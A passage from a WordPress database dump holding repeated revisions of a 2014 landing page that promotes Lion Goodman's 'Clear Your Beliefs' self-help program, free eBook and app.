Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 21:50:19', '2014-10-21 02:50:19', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1572, 2, '2014-10-20 23:15:00', '2014-10-21 04:15:00', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /> Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 23:15:00', '2014-10-21 04:15:00', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1573, 2, '2014-10-20 23:17:52', '2014-10-21 04:17:52', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 23:17:52', '2014-10-21 04:17:52', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1574, 2, '2014-10-20 23:57:22', '2014-10-21 04:57:22', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 255px;margin-bottom: 0px"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 23:57:22', '2014-10-21 04:57:22', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1575, 2, '2014-10-21 00:13:43', '2014-10-21 05:13:43', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;width: 1035px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 255px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-21 00:13:43', '2014-10-21 05:13:43', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1576, 2, '2014-10-21 08:21:23', '2014-10-21 13:21:23', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 255px; margin-bottom: 0px;"><a href="http://clearbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_031.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-21 08:21:23', '2014-10-21 13:21:23', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1578, 2, '2014-10-22 19:18:29', '2014-10-23 00:18:29', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nWhat You Can Accomplish with <em>Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n<h3 style="text-align: center">Are you a Coach?  Therapist? Healer?  Change Agent?</h3><p style="text-align: center">Bring the <em>Clear Your Beliefs</em> process into your 